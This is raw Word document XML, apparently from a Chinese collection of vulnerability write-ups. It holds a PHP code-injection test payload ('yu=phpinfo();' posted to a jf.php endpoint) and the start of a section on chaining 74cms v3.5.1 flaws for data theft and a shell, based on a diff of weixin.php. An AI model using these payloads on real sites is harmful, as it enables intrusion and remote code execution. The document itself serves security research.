          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="283" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="3263"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId104">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
            <w:w w:val="95"/>
          </w:rPr>
          <w:t>http://web/new/fenlei/do/jf.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>yu=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>phpinfo(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>随便找了个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="133"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>http://**.**.**.**/do/jf.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii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12"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3920044" cy="1668779"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12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044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rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:line="539" w:lineRule="exact"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="漏洞组合"/>
      <w:bookmarkStart w:id="93" w:name="骑士漏洞组合可致所有数据泄露+getshell_"/>
      <w:bookmarkStart w:id="94" w:name="_bookmark42"/>
      <w:bookmarkEnd w:id="92"/>
      <w:bookmarkEnd w:id="93"/>
      <w:bookmarkEnd w:id="94"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞组合</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="41"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Angsana New" w:eastAsia="Angsana New"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>骑士漏洞组合可</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>致所有</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数据泄露</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Angsana New" w:eastAsia="Angsana New"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>+getshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="Angsana New"/>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>作者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：龟兔赛跑</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417" w:right="317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lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>刚下了个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-66"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>74cms_v3.5.1_20141027.zip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">diff </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>了一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>了下面的改</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="51"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:pict>
          <v:group id="_x0000_s1490" style="position:absolute;left:0;text-align:left;margin-left:80.45pt;margin-top:18.65pt;width:338pt;height:211.8pt;z-index:8872;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1609,373" coordsize="6760,4236">
            <v:rect id="_x0000_s1584" style="position:absolute;left:1617;top:381;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1583" style="position:absolute;left:1797;top:624;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1582" style="position:absolute;left:2279;top:624;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1581" style="position:absolute;left:2399;top:624;width:603;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1580" style="position:absolute;left:3002;top:624;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1579" style="position:absolute;left:3122;top:624;width:3254;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1578" style="position:absolute;left:6376;top:624;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1577" style="position:absolute" from="1612,378" to="8366,378" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1576" style="position:absolute" from="1614,376" to="1614,887" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1575" style="position:absolute" from="8364,381" to="8364,887" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1574" style="position:absolute;left:1617;top:887;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1573" style="position:absolute;left:1797;top:950;width:3253;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1572" style="position:absolute" from="1614,887" to="1614,1213" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1571" style="position:absolute" from="8364,887" to="8364,1213" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1570" style="position:absolute;left:1617;top:1213;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1569" style="position:absolute;left:1797;top:1276;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1568" style="position:absolute;left:2158;top:1276;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1567" style="position:absolute;left:2279;top:1276;width:3253;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1566" style="position:absolute;left:5532;top:1276;width:845;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1565" style="position:absolute;left:6377;top:1276;width:1205;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1564" style="position:absolute;left:7582;top:1276;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1563" style="position:absolute" from="1614,1213" to="1614,1539" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1562" style="position:absolute" from="8364,1213" to="8364,1539" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1561" style="position:absolute;left:1617;top:1539;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1560" style="position:absolute;left:1797;top:1602;width:2169;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1559" style="position:absolute;left:3966;top:1602;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1558" style="position:absolute;left:4086;top:1602;width:603;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1557" style="position:absolute" from="1614,1539" to="1614,1865" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1556" style="position:absolute" from="8364,1539" to="8364,1865" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1555" style="position:absolute;left:1617;top:1865;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1554" style="position:absolute;left:1797;top:1928;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1553" style="position:absolute;left:2158;top:1928;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1552" style="position:absolute;left:2279;top:1928;width:3253;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1551" style="position:absolute;left:5532;top:1928;width:845;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1550" style="position:absolute;left:6377;top:1928;width:1205;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1549" style="position:absolute;left:7582;top:1928;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1548" style="position:absolute" from="1614,1865" to="1614,2191" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1547" style="position:absolute" from="8364,1865" to="8364,2191" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1546" style="position:absolute;left:1617;top:2191;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1545" style="position:absolute;left:1797;top:2254;width:2169;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1544" style="position:absolute;left:3966;top:2254;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1543" style="position:absolute;left:4086;top:2254;width:603;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1542" style="position:absolute" from="1614,2191" to="1614,2517" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1541" style="position:absolute" from="8364,2191" to="8364,2517" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1540" style="position:absolute;left:1617;top:2517;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1539" style="position:absolute;left:1797;top:2580;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1538" style="position:absolute" from="2078,2580" to="2078,2780" strokecolor="#f8f8f8" strokeweight="4pt"/>
            <v:rect id="_x0000_s1537" style="position:absolute;left:2118;top:2580;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1536" style="position:absolute" from="2881,2580" to="2881,2780" strokecolor="#f8f8f8" strokeweight="4pt"/>
            <v:rect id="_x0000_s1535" style="position:absolute;left:2921;top:2580;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1534" style="position:absolute" from="3684,2580" to="3684,2780" strokecolor="#f8f8f8" strokeweight="4pt"/>
            <v:rect id="_x0000_s1533" style="position:absolute;left:3724;top:2580;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1532" style="position:absolute" from="4005,2580" to="4005,2780" strokecolor="#f8f8f8" strokeweight="4pt"/>
            <v:rect id="_x0000_s1531" style="position:absolute;left:4045;top:2580;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1530" style="position:absolute" from="4687,2580" to="4687,2780" strokecolor="#f8f8f8" strokeweight="4pt"/>
            <v:rect id="_x0000_s1529" style="position:absolute;left:4727;top:2580;width:2531;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1528" style="position:absolute" from="7298,2580" to="7298,2780" strokecolor="#f8f8f8" strokeweight="4pt"/>
            <v:rect id="_x0000_s1527" style="position:absolute;left:7338;top:2580;width:844;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1526" style="position:absolute;left:8182;top:2580;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1525" style="position:absolute" from="1614,2517" to="1614,2843" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1524" style="position:absolute" from="8364,2517" to="8364,2843" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1523" style="position:absolute;left:1617;top:2843;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1522" style="position:absolute;left:1797;top:2906;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1521" style="position:absolute" from="1614,2843" to="1614,3169" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1520" style="position:absolute" from="8364,2843" to="8364,3169" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1519" style="position:absolute;left:1617;top:3169;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s1518" type="#_x0000_t75" style="position:absolute;left:1797;top:3232;width:620;height:200">
              <v:imagedata r:id="rId94" o:title=""/>
            </v:shape>
            <v:line id="_x0000_s1517" style="position:absolute" from="1614,3169" to="1614,3495" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1516" style="position:absolute" from="8364,3169" to="8364,3495" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1515" style="position:absolute;left:1617;top:3495;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s1514" type="#_x0000_t75" style="position:absolute;left:1797;top:3558;width:500;height:200">
              <v:imagedata r:id="rId106" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s1513" style="position:absolute;left:2297;top:3558;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1512" style="position:absolute;left:3020;top:3558;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1511" style="position:absolute;left:3140;top:3558;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1510" style="position:absolute;left:4104;top:3558;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1509" style="position:absolute;left:4225;top:3558;width:1566;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1508" style="position:absolute" from="1614,3495" to="1614,3821" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1507" style="position:absolute" from="8364,3495" to="8364,3821" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1506" style="position:absolute;left:1617;top:3821;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s1505" type="#_x0000_t75" style="position:absolute;left:1797;top:3884;width:620;height:200">
              <v:imagedata r:id="rId94" o:title=""/>
            </v:shape>
            <v:line id="_x0000_s1504" style="position:absolute" from="1614,3821" to="1614,4147" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1503" style="position:absolute" from="8364,3821" to="8364,4147" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1502" style="position:absolute;left:1617;top:4147;width:6745;height:455" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1501" style="position:absolute;left:1797;top:4210;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1500" style="position:absolute;left:1917;top:4210;width:796;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1499" style="position:absolute;left:2713;top:4210;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1498" style="position:absolute;left:3629;top:4210;width:3374;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1497" style="position:absolute" from="1612,4604" to="8366,4604" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1496" style="position:absolute" from="1614,4147" to="1614,4607" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1495" style="position:absolute" from="8364,4147" to="8364,4607" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:shape id="_x0000_s1494" type="#_x0000_t202" style="position:absolute;left:1798;top:624;width:4577;height:1829" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="391" w:lineRule="auto"/>
                      <w:ind w:right="-1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diff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-Nurp</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333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upload.1020/plus/weixin.php upload.1027/plus/weixin.php</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="391" w:lineRule="auto"/>
                      <w:ind w:right="82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--- upload.1020/plus/weixin.php 12:14:22.000000000 +0800</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:ind w:right="-1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+++ upload.1027/plus/weixin.php</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="124" w:line="200" w:lineRule="exact"/>
                      <w:ind w:right="-1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14:45:22.000000000 +0800</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
            </v:shape>
            <v:shape id="_x0000_s1493" type="#_x0000_t202" style="position:absolute;left:6377;top:1277;width:1203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2014-10-18</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
            </v:shape>
            <v:shape id="_x0000_s1492" type="#_x0000_t202" style="position:absolute;left:6377;top:1930;width:1203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2014-10-25</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
            </v:shape>
            <v:shape id="_x0000_s1491" type="#_x0000_t202" style="position:absolute;left:1798;top:2580;width:6382;height:1829" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="391" w:lineRule="auto"/>
                      <w:ind w:right="-4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@@</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-4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-21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,10</w:t>
                    </w:r>
                    <w:proofErr w:type="gramEnd"/>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333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+21,10</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333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@@</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-46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class</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-4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wechatCallbackapiTest</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333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extends mysq</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:ind w:left="49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499" w:right="-5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responseMsg()</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/>
                      <w:ind w:left="49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tabs>
                        <w:tab w:val="left" w:pos="1831"/>
                      </w:tabs>
                      <w:spacing w:before="124" w:line="200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-</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:tab/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!$this-&gt;</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>checkSignature())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宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr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4"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="7"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="229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1367" style="width:338pt;height:198.05pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6760,3961">
            <v:rect id="_x0000_s1489" style="position:absolute;left:8;top:8;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1488" style="position:absolute;left:188;top:250;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1487" style="position:absolute;left:308;top:250;width:796;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1486" style="position:absolute;left:1104;top:250;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1485" style="position:absolute;left:2020;top:250;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1484" style="position:absolute" from="3,5" to="6757,5" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1483" style="position:absolute" from="5,3" to="5,513" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1482" style="position:absolute" from="6755,7" to="6755,514" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1481" style="position:absolute;left:8;top:513;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1480" style="position:absolute;left:188;top:577;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1479" style="position:absolute;left:308;top:577;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1478" style="position:absolute;left:408;top:577;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1477" style="position:absolute;left:508;top:577;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1476" style="position:absolute;left:608;top:577;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1475" style="position:absolute;left:708;top:577;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1474" style="position:absolute;left:808;top:577;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1473" style="position:absolute;left:908;top:577;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
